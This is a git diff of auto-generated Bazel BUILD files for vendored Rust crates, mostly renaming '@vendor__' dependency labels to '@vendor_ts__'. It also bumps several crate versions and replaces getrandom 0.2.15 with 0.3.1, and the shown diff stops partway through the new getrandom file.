a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-korean-1.20141219.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-korean-1.20141219.5.bazel index c7a1933827f7..97a7c7735c15 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-korean-1.20141219.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-korean-1.20141219.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.20141219.5", deps = [ - "@vendor__encoding_index_tests-0.1.4//:encoding_index_tests", + "@vendor_ts__encoding_index_tests-0.1.4//:encoding_index_tests", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-simpchinese-1.20141219.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-simpchinese-1.20141219.5.bazel index 9b21912641fe..1d849a7173a9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-simpchinese-1.20141219.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-simpchinese-1.20141219.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.20141219.5", deps = [ - "@vendor__encoding_index_tests-0.1.4//:encoding_index_tests", + "@vendor_ts__encoding_index_tests-0.1.4//:encoding_index_tests", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-singlebyte-1.20141219.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-singlebyte-1.20141219.5.bazel index 6777eeecd0fe..c2abfe5614be 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-singlebyte-1.20141219.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-singlebyte-1.20141219.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.20141219.5", deps = [ - "@vendor__encoding_index_tests-0.1.4//:encoding_index_tests", + "@vendor_ts__encoding_index_tests-0.1.4//:encoding_index_tests", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-tradchinese-1.20141219.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-tradchinese-1.20141219.5.bazel index a84d85e6d7c6..60e931b095a7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-tradchinese-1.20141219.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-tradchinese-1.20141219.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.20141219.5", deps = [ - "@vendor__encoding_index_tests-0.1.4//:encoding_index_tests", + "@vendor_ts__encoding_index_tests-0.1.4//:encoding_index_tests", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.figment-0.10.19.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.figment-0.10.19.bazel index 96f9285e43c7..176db4ab06a9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.figment-0.10.19.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.figment-0.10.19.bazel @@ -89,53 +89,53 @@ rust_library( }), version = "0.10.19", deps = [ - "@vendor__figment-0.10.19//:build_script_build", - "@vendor__pear-0.2.9//:pear", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_yaml-0.9.34-deprecated//:serde_yaml", - "@vendor__uncased-0.9.10//:uncased", + "@vendor_ts__figment-0.10.19//:build_script_build", + "@vendor_ts__pear-0.2.9//:pear", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_yaml-0.9.34-deprecated//:serde_yaml", + "@vendor_ts__uncased-0.9.10//:uncased", ] + select({ "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:thumbv7em-none-eabi": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:wasm32-unknown-unknown": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "@rules_rust//rust/platform:wasm32-wasip1": [ - "@vendor__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) + "@vendor_ts__atomic-0.6.0//:atomic", # cfg(any(target_pointer_width = "8", target_pointer_width = "16", target_pointer_width = "32")) ], "//conditions:default": [], }), @@ -196,7 +196,7 @@ cargo_build_script( version = "0.10.19", visibility = ["//visibility:private"], deps = [ - "@vendor__version_check-0.9.5//:version_check", + "@vendor_ts__version_check-0.9.5//:version_check", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.filetime-0.2.25.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.filetime-0.2.25.bazel index 598f69662035..afa987bf06c9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.filetime-0.2.25.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.filetime-0.2.25.bazel @@ -81,88 +81,88 @@ rust_library( }), version = "0.2.25", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", ] + select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) + "@vendor_ts__libc-0.2.169//:libc", # cfg(unix) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.0.35.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.1.0.bazel similarity index 96% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.0.35.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.1.0.bazel index 6a1e3a3263b1..348b7df02744 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.0.35.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.flate2-1.1.0.bazel @@ -85,9 +85,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.35", + version = "1.1.0", deps = [ - "@vendor__crc32fast-1.4.2//:crc32fast", - "@vendor__miniz_oxide-0.8.2//:miniz_oxide", + "@vendor_ts__crc32fast-1.4.2//:crc32fast", + "@vendor_ts__miniz_oxide-0.8.5//:miniz_oxide", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fs-err-2.11.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fs-err-2.11.0.bazel index 680fded6c546..59751efc4aa0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fs-err-2.11.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fs-err-2.11.0.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "2.11.0", deps = [ - "@vendor__fs-err-2.11.0//:build_script_build", + "@vendor_ts__fs-err-2.11.0//:build_script_build", ], ) @@ -134,7 +134,7 @@ cargo_build_script( version = "2.11.0", visibility = ["//visibility:private"], deps = [ - "@vendor__autocfg-1.4.0//:autocfg", + "@vendor_ts__autocfg-1.4.0//:autocfg", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fsevent-sys-4.1.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fsevent-sys-4.1.0.bazel index 5b280ccfeb80..fa1103d4e4ab 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fsevent-sys-4.1.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fsevent-sys-4.1.0.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "4.1.0", deps = [ - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__libc-0.2.169//:libc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fst-0.4.7.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fst-0.4.7.bazel index e358007c5fd3..d0d00bc09926 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fst-0.4.7.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.fst-0.4.7.bazel @@ -85,7 +85,7 @@ rust_library( }), version = "0.4.7", deps = [ - "@vendor__fst-0.4.7//:build_script_build", + "@vendor_ts__fst-0.4.7//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.2.15.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.2.15.bazel deleted file mode 100644 index 83de162212b9..000000000000 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.2.15.bazel +++ /dev/null @@ -1,166 +0,0 @@ -############################################################################### -# @generated -# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To -# regenerate this file, run the following: -# -# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors -############################################################################### - -load("@rules_rust//rust:defs.bzl", "rust_library") - -package(default_visibility = ["//visibility:public"]) - -rust_library( - name = "getrandom", - srcs = glob( - include = ["**/*.rs"], - allow_empty = True, - ), - compile_data = glob( - include = ["**"], - allow_empty = True, - exclude = [ - "**/* *", - ".tmp_git_root/**/*", - "BUILD", - "BUILD.bazel", - "WORKSPACE", - "WORKSPACE.bazel", - ], - ), - crate_features = [ - "std", - ], - crate_root = "src/lib.rs", - edition = "2018", - rustc_flags = [ - "--cap-lints=allow", - ], - tags = [ - "cargo-bazel", - "crate-name=getrandom", - "manual", - "noclippy", - "norustfmt", - ], - target_compatible_with = select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [], - "@rules_rust//rust/platform:aarch64-apple-ios": [], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], - "@rules_rust//rust/platform:aarch64-linux-android": [], - "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], - "@rules_rust//rust/platform:aarch64-unknown-uefi": [], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:armv7-linux-androideabi": [], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:i686-apple-darwin": [], - "@rules_rust//rust/platform:i686-linux-android": [], - "@rules_rust//rust/platform:i686-pc-windows-msvc": [], - "@rules_rust//rust/platform:i686-unknown-freebsd": [], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], - "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], - "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], - "@rules_rust//rust/platform:thumbv7em-none-eabi": [], - "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], - "@rules_rust//rust/platform:wasm32-unknown-unknown": [], - "@rules_rust//rust/platform:wasm32-wasip1": [], - "@rules_rust//rust/platform:x86_64-apple-darwin": [], - "@rules_rust//rust/platform:x86_64-apple-ios": [], - "@rules_rust//rust/platform:x86_64-linux-android": [], - "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-none": [], - "@rules_rust//rust/platform:x86_64-unknown-uefi": [], - "//conditions:default": ["@platforms//:incompatible"], - }), - version = "0.2.15", - deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - ] + select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:wasm32-wasip1": [ - "@vendor__wasi-0.11.0-wasi-snapshot-preview1//:wasi", # cfg(target_os = "wasi") - ], - "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # cfg(unix) - ], - "//conditions:default": [], - }), -) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.3.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.3.1.bazel new file mode 100644 index 000000000000..ae0fc92ddc7c --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.getrandom-0.3.1.bazel @@ -0,0 +1,226 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//cargo:defs.bzl", "cargo_build_script") +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "getrandom", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "std", + ], + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=getrandom", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.3.1", + deps = [ + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__getrandom-0.3.1//:build_script_build", + ] + select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "macos", target_os = "openbsd", target_os = "vita", target_os = "emscripten")) + ], + "@rules_rust//rust/platform:aarch64-apple-ios": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "ios", target_os = "visionos", target_os = "watchos", target_os = "tvos")) + ], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "ios", target_os = "visionos", target_os = "watchos", target_os = "tvos")) + ], + "@rules_rust//rust/platform:aarch64-linux-android": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # cfg(all(windows, not(target_vendor = "win7"))) + ], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(any(target_os = "haiku", target_os = "redox", target_os = "nto", target_os = "aix")) + ], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ + "@vendor_ts__libc-0.2.169//:libc", # cfg(all(any(target_os = "linux", target_os = "android"), not(any(getrandom_backend = "custom", getrandom_backend = "rdrand", getrandom_backend = "rndr")))) + ], + 